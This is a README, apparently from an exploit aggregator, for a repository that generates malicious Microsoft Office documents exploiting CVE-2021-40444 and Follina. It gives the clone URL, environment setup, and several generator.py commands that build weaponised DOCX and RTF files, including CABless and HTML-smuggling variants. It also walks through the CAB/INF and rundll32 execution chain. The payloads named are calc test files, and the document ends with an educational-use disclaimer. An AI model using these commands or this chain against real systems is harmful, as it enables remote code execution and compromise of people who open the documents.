## https://sploitus.com/exploit?id=57E4A0BC-33C1-5EBF-919F-D7AD7FC586A7
# Exploiting Follina CVE and CVE-2021-40444 Vulnerabilities
## Table of Contents
1. [Introduction](#introduction)
2. [Prerequisites](#prerequisites)
3. [Setup and Installation](#setup-and-installation)
4. [Usage](#usage)
5. [Detailed Explanation](#detailed-explanation)
6. [Commands](#commands)
7. [Disclaimer](#disclaimer)
## Introduction
This repository contains scripts and resources for exploiting the Follina CVE and CVE-2021-40444 vulnerabilities in Microsoft Office. The scripts generate malicious document files that can execute arbitrary code on the target system.
## Prerequisites
- Flare VM
- Python 3.x
- Microsoft Word
- Required Python packages (listed in `requirements.txt`)
## Setup and Installation
1. **Flare VM Setup:**
- Ensure you have Flare VM installed. The credentials for the VM are:
- Username: `lab`
- Password: `password`
2. **Python and Virtual Environment:**
```bash
git clone https://github.com/basim-ahmad/Follina-CVE-and-CVE-2021-40444.git
cd CVE-2021-40444
```
- Make sure Python and pip are installed in the virtual machine.
- Install the `virtualenv` package using the following command:
```bash
pip install virtualenv
```
- Create a virtual environment named `venv`:
```bash
python -m virtualenv venv
```
- Activate the virtual environment:
```bash
venv\Scripts\activate.bat
```
- Install the required packages:
```bash
pip install -r requirements.txt
```
## Usage
1. **Generating the Exploit:**
- Navigate to the project directory and run the following command to generate the exploit:
```bash
python generator.py -u http://192.168.197.132 -P test\calc.dll --host
```
Replace `192.168.197.132` with your IP address.
2. **Accessing the Generated Document:**
- The generated `.docx` file will be located in the directory:
```
C:\Users\Lab\Desktop\project\CVE-2021-40444\out\document.docx
```
## Detailed Explanation
### Chain Exploitation
- The document (`.docx`) is opened.
- The document contains a relationship pointing to malicious HTML stored in `document.xml.rels`.
- The HTML link opens in IE preview.
- An object points to a CAB file and an iframe pointing to an INF file, both embedded in JScript and prefixed with the ".cpl:" directive.
- The CAB file opens, saving the INF file in the `%TEMP%Low` directory.
- The INF file is opened using the ".cpl:" directive, causing `rundll32` to side-load the INF file.
### Scripts Overview
#### `generator.py`
- Implements an exploit for CVE-2021-40444, allowing remote code execution via Microsoft Office.
- Contains various helper functions for patching CAB files, creating RAR files, generating payloads, and more.
#### `cab_parser.py`
- A tool for viewing CAB file headers.
- Defines classes and methods for handling and parsing CAB files.
### Section 2.0: Setup in Flare VM
- Install necessary tools and packages.
- Create and activate a virtual environment.
- Install Python packages from `requirements.txt`.
## Commands
- Generate the original exploit and test locally:
```bash
python generator.py -u http://127.0.0.1 -P test\calc.dll --host
- Generate CABless exploit leveraging MS-MSDT (Follina attack), in both DOCX and RTF docs:
```bash
python generator.py -u http://127.0.0.1 -P test\calc.ps1 --no-cab --host --convert
- Generate CABless exploit (IE-only) with HTML smuggling and test locally via IE:
```bash
python generator.py -u http://127.0.0.1 -P test\calc.js --no-cab --host -t
- Generate CABless exploit with RAR and test locally via IE:
```bash
python generator.py -u http://127.0.0.1 -P test\job-jscript.wsf --no-cab --host -t
## Disclaimer
This project is for educational purposes only. Use it responsibly and do not exploit vulnerabilities on systems you do not have permission to test. Misuse of this information can lead to criminal charges.